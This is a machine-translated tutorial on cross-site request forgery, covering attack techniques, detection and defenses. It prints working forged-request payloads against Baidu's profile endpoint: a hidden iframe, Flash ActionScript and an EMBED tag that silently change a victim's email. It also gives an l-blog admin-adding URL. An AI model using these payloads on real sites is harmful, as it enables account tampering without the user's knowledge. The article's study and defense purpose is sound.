CSRF-Attack and Defense

1. What is a csrf attack?

Csrf is the abbreviation of Cross Site Request Forgery (xsrf, that is, perform get/post operations on a CGI in a user session. Users may not know and want to do these tasks. You can hijack HTTP sessions.
The website uses cookies to identify users. After a user successfully authenticates, the browser will obtain a cookie that identifies the user's identity, as long as the browser is not closed or logged out, this cookie will be carried when you visit this website later. If the browser is controlled to request the URL of the website during this period, some functions (such as modifying Personal Data) that the user does not want to do may be executed ). Because this is not the request that the user really wants to send, this is the so-called request forgery; Haha, because these requests can also be submitted from a third-party website, so the prefix is cross-site.
For example, a BBS can map and write the Logout link in the URL of the texture. After reading this post, the user will log out, because the user accessed the Logout link as his identity, in the user's opinion, there is a problematic "image" in the post, rather than wanting to exit, however, the program will assume that the user requests to log out and destroy the session. This is the legendary csrf attack.
Don't underestimate csrf. Remember that l-blog had a csrf Vulnerability (I didn't know the concept at the time: P). It adds an administrator with a link like this: http: // localhost/L-blog/admincp. asp? Action = Member & type = editmem & memid = 2 & memtype = supadmin; there is also the Google csrf vulnerability [1], which will cause email leakage. In addition, do not think that only XSS can erupt worms. as long as the conditions are appropriate, csrf is also possible.

2. Where do threats come from?

Paster is only a GET method. In many cases, we need to forge POST requests. One way is to use cross-site. Of course, the target site may not exist. In this case, we can launch an attack from a third-party website.
For example, if I want to attack a problematic blog, I should leave a comment on the target blog and leave a website address to lure the owner to click it. (This depends on your flickering skills: p ), then construct an HTML form to submit some data.
The Multi-Window browser is helpful.
Multi-Window browsers (firefox, roaming, MyIE ......) Convenience also brings about some problems, because the new window opened by the Multi-Window browser has all the current sessions. That is, I used IE to log on to my Blog, and then I want to watch the news and run another IE process. At this time, the sessions in the two IE Windows are independent of each other, from IE sending requests to the Blog, there will be no cookie for my logon. However, there will always be only one process in a multi-window browser, and sessions in each window are common, that is, when you send a request to the Blog in the News window, the cookie that I log on to the blog will be taken.
Think about it. When we click a link left by someone else in Blog/BBS/WebMail, a well-prepared CSRF attack may be waiting for us.

3. Initiate a CSRF attack

From a third-party site to use POST to launch a CSRF attack, the form is automatically submitted to the target CGI using Javascript. It is not convenient to write forms every time. The auxiliary tools include xss post Forwarder [2] and CSRF Redirector [3]. Here I also wrote the corresponding ASP version [4]. When used, you only need to pass the submitted url and parameters to it, and it will automatically POST to the target.
For example, I want to submit some data to www.0x54.org/a.asp:http://www.0x54.org/lake2/xss_post_forwarder.asp? Lake2 = http://www.0x54.org/a.asp&a=123& B =321&c=%26%23%25 (here you need to consider URL encoding)
But in actual attacks, you have to think about how to trick users into our web pages.

4. One instance

Because CSRF is not as eye-catching as XSS, it is easy to find a Web application with CSRF. This time our goal is Baidu, just for test.
Whatever way you use, let a user who has logged on to Baidu access this URL: http://www.0x54.org/lake2/xss_post_forwarder.asp? Lake2 = http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B& B %3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B
Then, check whether the personal information of the person has been modified. This is a bit depressing. When the person accesses the URL, the browser will return to the page where the information is successfully modified, and we will be found. Is there a way to prevent the browser from refreshing?
Yes.
One way is to construct such HTML code with iframe: <iframe width = 0 height = 0 src = "http://www.0x54.org/lake2/xss_post_forwarder.asp? Lake2 = http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B& B %3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B "> </iframe>
Another way is to use flash.

5. CSRF With Flash

Flash can submit data to any URL. Open the pirated Adobe flash CS 3 Professional, create a flash file (ActionScript 3.0), and right-click the default layer to select the action, then add the following code:
:

Import flash.net. URLRequest;
Import flash. system. Security;
Var url = new URLRequest ("http://www.0x54.org/lake2 ");
Var lake = new URLVariables ();
Lake = "a = lake2 ";
Url. method = "POST ";
Url. data = lake;
SendToURL (url );
Stop ();

Export as swf file, access it, capture the package to see the effect of a little: http://www.0x54.org/lake2/flash/test1.html
Every time I write as and compile swf, It is very troublesome. According to CSRF Redirector's idea, I wrote a similar flash program [5], and then I tried it with Baidu, visit the web page with the following HTML: <EMBED src = "http://www.0x54.org/lake2/flash/flash_hacking.swf? F = 1 & t = http://passport.baidu.com/ucommitbas&d=u_jump_url%3D%26sex%3D1%26email%3DCSRF@baidu.com%26sdv%3D%26zodiac%3D0%26birth_year%3D0%26birth_month%3D0%26birth_day%3D0%26blood%3D0%26bs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs2%3D%25CE%25DE%26txt_bs%3D%26birth_site%3D%253B%253B%26b%253Drs0%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs2%3D%25CE%25DE%26txt_rs%3D%26reside_site%3D%253B%253B "> </EMBED> (still pay attention to URL secondary encoding)
Here, we should not only send requests. In fact, flash can get the returned content. If the returned content has sensitive information, it can be read and sent to the controlled Web. Of course, it depends on whether the target site allows flash to retrieve content across domains.

6. CSRF Detection

The CSRF vulnerability is detected by physical activity. capture a normal request packet, remove the referer field, and submit the packet again. If it is still valid, there is basically a problem. Of course, the parameter may contain unpredictable parameters (such as userid or something). At this time, it depends on whether this unpredictable parameter can be obtained through other means, such as flash. If yes, the problem still exists. Also, try to change post to get, because some programs do not distinguish get/post.
The functions and return forms of applications are different, so it is still a little difficult to automatically test the CSRF vulnerability. OWASP has a tool named CSRFTester on it. [6]

7. Defense Against CSRF

WAF defends against CSRF vulnerabilities on the Web application side. Generally, referer, token, or verification code are used. The Nexus article [7] has been fully written; superhei also proposed the bypass idea [8]. Please refer to their article.
Another idea is to defend against the client. It seems that a software similar to HTTP Watch can be built, and the browser can be used to intercept or filter cross-domain cookies.